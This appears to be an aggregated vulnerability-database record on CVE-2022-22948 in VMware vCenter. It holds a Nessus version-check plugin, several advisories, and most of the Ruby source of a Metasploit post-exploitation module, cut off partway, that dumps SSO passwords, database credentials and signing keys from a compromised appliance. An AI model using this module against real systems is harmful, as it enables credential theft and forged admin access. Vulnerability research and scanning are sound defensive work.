The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3r, 6.7 prior to 6.7 U3p, or 7.0 prior to 7.0 U3d. It is, therefore, affected by an information disclosure vulnerability caused by improper file permissions. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.
Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. For 6.5 and 6.7 the plugin reports only when paranoid reporting is enabled, because only the virtual appliance build is affected and the version check cannot distinguish it from the Windows build. Nessus has also not tested for the presence of a workaround.
{"id": "VMWARE_VCENTER_VMSA-2022-0009.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "VMware vCenter Server 6.5 / 6.7 / 7.0 Information Disclosure (VMSA-2022-0009)", "description": "The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3r, 6.7 prior to 6.7 U3p, or 7.0 prior to 7.0 U3d. It is, therefore, affected by an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "published": "2022-03-29T00:00:00", "modified": "2022-12-05T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 4.0}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://www.tenable.com/plugins/nessus/159306", "reporter": "This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://www.pentera.io/blog/information-disclosure-in-vmware-vcenter/", "https://www.vmware.com/security/advisories/VMSA-2022-0009.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22948"], "cvelist": ["CVE-2022-22948"], "immutableFields": [], "lastseen": "2023-01-10T19:18:57", "viewCount": 19, "enchantments": {"score": {"value": -0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "cnvd", "idList": ["CNVD-2022-55066"]}, {"type": "cve", "idList": ["CVE-2022-22948"]}, {"type": "githubexploit", "idList": ["85297C63-422A-5704-8CDD-A701EF92E0C1"]}, {"type": "metasploit", "idList": ["MSF:POST-LINUX-GATHER-VCENTER_SECRETS_DUMP-"]}, {"type": "vmware", "idList": ["VMSA-2022-0009", "VMSA-2022-0009.1"]}]}, "vulnersScore": -0.7}, "_state": {"score": 1673378620, "dependencies": 1673378777}, "_internal": {"score_hash": "a85c0ebf3351a68fccbab85750f64fb2"}, "pluginID": "159306", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159306);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2022-22948\");\n script_xref(name:\"IAVA\", value:\"2022-A-0127\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0011\");\n\n script_name(english:\"VMware vCenter Server 6.5 / 6.7 / 7.0 Information Disclosure (VMSA-2022-0009)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3r, 6.7 prior to 6.7 U3p, or\n7.0 prior to 7.0 U3d. 
It is, therefore, affected by an information disclosure vulnerability due to improper permission\nof files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access\nto sensitive information.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version \nnumber. Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0009.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.pentera.io/blog/information-disclosure-in-vmware-vcenter/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.5 U3r, 6.7 U3p, or 7.0 U3d or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22948\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::vmware_vcenter::get_app_info();\n\n# audit out if we're on 6.5 or 6.7 since only the Virtual Appliance version is vuln, while the Windows version isn't\n# affected, and we can't tell the difference\nif (app_info.version =~ \"^6\\.[57]\\.\" && report_paranoia < 2)\n audit(AUDIT_POTENTIAL_VULN, app_info.app, app_info.display_version, app_info.port);\n\nvar constraints = [\n { 'min_version' : '6.5', 'fixed_version' : '6.5.18711281', 'fixed_display' : '6.5 U3r' },\n { 'min_version' : '6.7', 'fixed_version' : '6.7.18831049', 'fixed_display' : '6.7 U3p' },\n { 'min_version' : '7.0', 'fixed_version' : '7.0.19480866', 'fixed_display' : '7.0 U3d' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "naslFamily": "Misc.", "cpe": ["cpe:/a:vmware:vcenter_server"], "solution": "Upgrade to VMware vCenter Server 6.5 U3r, 6.7 U3p, or 7.0 U3d or later.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2022-22948", "vendor_cvss2": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "vendor_cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2022-03-29T00:00:00", "vulnerabilityPublicationDate": "2022-03-29T00:00:00", "exploitableWith": []}
{"vmware": [{"lastseen": "2022-11-02T11:54:02", "description": "3\\. vCenter Server information disclosure vulnerability (CVE-2022-22948) \n\nThe vCenter Server contains an information disclosure vulnerability due to improper permission of files. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.5.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-29T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address an information disclosure vulnerability (CVE-2022-22948)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-05-18T00:00:00", "id": "VMSA-2022-0009.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0009.1.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-05-26T00:56:09", "description": "3\\. vCenter Server information disclosure vulnerability (CVE-2022-22948) \n\nThe vCenter Server contains an information disclosure vulnerability due to improper permission of files. 
VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.5.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-29T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address an information disclosure vulnerability (CVE-2022-22948)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-03-29T00:00:00", "id": "VMSA-2022-0009", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0009.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-04-08T14:36:59", "description": "The vCenter Server contains an information disclosure vulnerability due to improper permission of files. 
A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-29T18:15:00", "type": "cve", "title": "CVE-2022-22948", "cwe": ["CWE-276"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-04-08T12:58:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:cloud_foundation:3.11", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2022-22948", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22948", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3p:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2a:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update3c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3l:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3n:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3n:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3o:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.11:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3q:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3m:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*"]}], "cnvd": [{"lastseen": "2022-08-15T17:48:06", "description": "VMware vCenter Server is a suite of server and virtualization management software from Vmware, Inc. 
VMware vCenter Server is vulnerable to an information disclosure vulnerability that could be exploited by an attacker with unmanaged access to gain access to sensitive information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-31T00:00:00", "type": "cnvd", "title": "VMware vCenter Server Information Disclosure Vulnerability (CNVD-2022-55066)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-08-03T00:00:00", "id": "CNVD-2022-55066", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-55066", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-08-16T06:05:48", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-17T09:59:20", "type": "githubexploit", "title": "Exploit for Incorrect Default Permissions in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-08-03T05:46:44", "id": "85297C63-422A-5704-8CDD-A701EF92E0C1", "href": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "privateArea": 1}], "metasploit": [{"lastseen": "2022-12-05T20:47:20", "description": "Grab secrets and keys from the vCenter server and add them to loot. This module is tested against the vCenter appliance only; it will not work on Windows vCenter instances. It is intended to be run after successfully acquiring root access on a vCenter appliance and is useful for penetrating further into the environment following a vCenter exploit that results in a root shell. Secrets include the dcAccountDN and dcAccountPassword for the vCenter machine which can be used for maniuplating the SSO domain via standard LDAP interface; good for plugging into the vmware_vcenter_vmdir_ldap module or for adding new SSO admin users. 
The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with associated private keys are also plundered and can be used to sign forged SAML assertions for the /ui admin interface.\n", "cvss3": {}, "published": "2022-08-06T18:01:56", "type": "metasploit", "title": "VMware vCenter Secrets Dump", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22948"], "modified": "2022-11-19T15:37:36", "id": "MSF:POST-LINUX-GATHER-VCENTER_SECRETS_DUMP-", "href": "https://www.rapid7.com/db/modules/post/linux/gather/vcenter_secrets_dump/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/hashes'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Auxiliary::Report\n include Msf::Post::Linux::Priv\n include Msf::Post::Vcenter::Vcenter\n include Msf::Post::Vcenter::Database\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Secrets Dump',\n 'Description' => %q{\n Grab secrets and keys from the vCenter server and add them to\n loot. This module is tested against the vCenter appliance only;\n it will not work on Windows vCenter instances. It is intended to\n be run after successfully acquiring root access on a vCenter\n appliance and is useful for penetrating further into the\n environment following a vCenter exploit that results in a root\n shell.\n\n Secrets include the dcAccountDN and dcAccountPassword for\n the vCenter machine which can be used for maniuplating the SSO\n domain via standard LDAP interface; good for plugging into the\n vmware_vcenter_vmdir_ldap module or for adding new SSO admin\n users. 
The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with\n associated private keys are also plundered and can be used to\n sign forged SAML assertions for the /ui admin interface.\n },\n 'Author' => [\n 'npm[at]cesium137.io', # original vcenter secrets dump\n 'Erik Wynter', # @wyntererik, postgres additions\n 'h00die' # tying it all together\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'DisclosureDate' => '2022-04-15',\n 'SessionTypes' => [ 'meterpreter', 'shell' ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [\n 'Dump',\n {\n 'Description' => 'Dump vCenter Secrets'\n }\n ]\n ],\n 'DefaultAction' => 'Dump',\n 'References' => [\n [ 'URL', 'https://github.com/shmilylty/vhost_password_decrypt' ],\n [ 'CVE', '2022-22948' ],\n [ 'URL', 'https://pentera.io/blog/information-disclosure-in-vmware-vcenter/' ],\n [ 'URL', 'https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb' ]\n ],\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_advanced_options([\n OptBool.new('DUMP_VMDIR', [ true, 'Extract SSO domain information', true ]),\n OptBool.new('DUMP_VMAFD', [ true, 'Extract vSphere certificates, private keys, and secrets', true ]),\n OptBool.new('DUMP_SPEC', [ true, 'If DUMP_VMAFD is enabled, attempt to extract VM Guest Customization secrets from PSQL', true ]),\n OptBool.new('DUMP_LIC', [ true, 'If DUMP_VMDIR is enabled, attempt to extract vSphere license keys', false ])\n ])\n end\n\n # this is only here because of the SSO portion, which will get moved to the vcenter lib once someone is able to provide output to test against.\n def ldapsearch_bin\n '/opt/likewise/bin/ldapsearch'\n end\n\n def psql_bin\n '/opt/vmware/vpostgres/current/bin/psql'\n end\n\n def vcenter_management\n vc_type_embedded || vc_type_management\n end\n\n def vcenter_infrastructure\n vc_type_embedded || vc_type_infrastructure\n end\n\n 
def check_cve_2022_22948\n # https://github.com/PenteraIO/CVE-2022-22948/blob/main/CVE-2022-22948-scanner.sh#L5\n cmd_exec('stat -c \"%G\" \"/etc/vmware-vpx/vcdb.properties\"') == 'cis'\n end\n\n def run\n get_vcsa_version\n\n if check_cve_2022_22948\n print_good('Vulnerable to CVE-2022-22948')\n report_vuln(\n host: rhost,\n port: rport,\n name: name,\n refs: ['CVE-2022-22948'],\n info: \"Module #{fullname} found /etc/vmware-vpx/vcdb.properties owned by cis group\"\n )\n end\n\n print_status('Validating target')\n validate_target\n\n print_status('Gathering vSphere SSO domain information')\n vmdir_init\n\n print_status('Extracting PostgreSQL database credentials')\n get_db_creds\n\n print_status('Extract ESXi host vpxuser credentials')\n enum_vpx_user_creds\n\n if datastore['DUMP_VMDIR'] && vcenter_infrastructure\n print_status('Extracting vSphere SSO domain secrets')\n vmdir_dump\n end\n\n if datastore['DUMP_VMAFD']\n print_status('Extracting certificates from vSphere platform')\n vmafd_dump\n if datastore['DUMP_SPEC'] && vcenter_management\n print_status('Searching for secrets in VM Guest Customization Specification XML')\n enum_vm_cust_spec\n end\n end\n\n if is_root?\n print_status('Retrieving .pgpass file')\n retrieved_pg_creds = false\n pgpass_contents = process_pgpass_file\n\n pgpass_contents.each do |p|\n extra_service_data = {\n address: p['hostname'] =~ /localhost|127.0.0.1/ ? 
Rex::Socket.getaddress(rhost) : p['hostname'],\n port: p['port'],\n service_name: 'psql',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service\n }\n print_good(\".pgpass creds found: #{p['username']}, #{p['password']} for #{p['hostname']}:#{p['database']}\")\n store_valid_credential(user: p['username'], private: p['password'], service_data: extra_service_data, private_type: :password)\n next if p['database'] != 'postgres'\n\n next unless retrieved_pg_creds == false\n\n creds = query_pg_shadow_values(p['password'], p['username'], p['database'])\n retrieved_pg_creds = true unless creds.nil?\n creds.each do |cred|\n print_good(\"posgres database creds found: #{cred['user']}, #{cred['password_hash']}\")\n credential_data = {\n username: cred['user'],\n private_data: cred['password_hash'],\n private_type: :nonreplayable_hash,\n jtr_format: Metasploit::Framework::Hashes.identify_hash(cred['password_hash'])\n }.merge(extra_service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(extra_service_data)\n\n create_credential_login(login_data)\n end\n end\n path = store_loot('.pgpass', 'text/plain', session, pgpass_contents, 'pgpass.json')\n print_good(\"Saving the /root/.pgpass contents to #{path}\")\n end\n end\n\n def vmdir_init\n self.keystore = {}\n\n vsphere_machine_id = get_machine_id\n if is_uuid?(vsphere_machine_id)\n vprint_status(\"vSphere Machine ID: #{vsphere_machine_id}\")\n else\n print_bad('Invalid vSphere PSC Machine UUID returned from vmafd-cli')\n end\n\n vsphere_domain_name = get_domain_name\n unless is_fqdn?(vsphere_domain_name)\n fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vSphere SSO domain name via lwregshell')\n end\n\n self.base_fqdn = vsphere_domain_name.to_s.downcase\n vprint_status(\"vSphere SSO Domain FQDN: #{base_fqdn}\")\n\n vsphere_domain_dn = 'dc=' + base_fqdn.split('.').join(',dc=')\n 
self.base_dn = vsphere_domain_dn\n vprint_status(\"vSphere SSO Domain DN: #{base_dn}\")\n\n vprint_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter')\n vsphere_domain_dc_dn = get_domain_dc_dn\n unless is_dn?(vsphere_domain_dc_dn)\n fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountDN from lwregshell')\n end\n\n self.bind_dn = vsphere_domain_dc_dn\n print_good(\"vSphere SSO DC DN: #{bind_dn}\")\n self.bind_pw = get_domain_dc_password\n unless bind_pw\n fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountPassword from lwregshell')\n end\n\n print_good(\"vSphere SSO DC PW: #{bind_pw}\")\n # clean up double quotes\n # originally we wrapped in singles, but escaping of single quotes was not working, so prefer doubles\n self.bind_pw = bind_pw.gsub('\"') { '\\\\\"' }\n self.shell_bind_pw = \"\\\"#{bind_pw}\\\"\"\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 389,\n service_name: 'ldap',\n protocol: 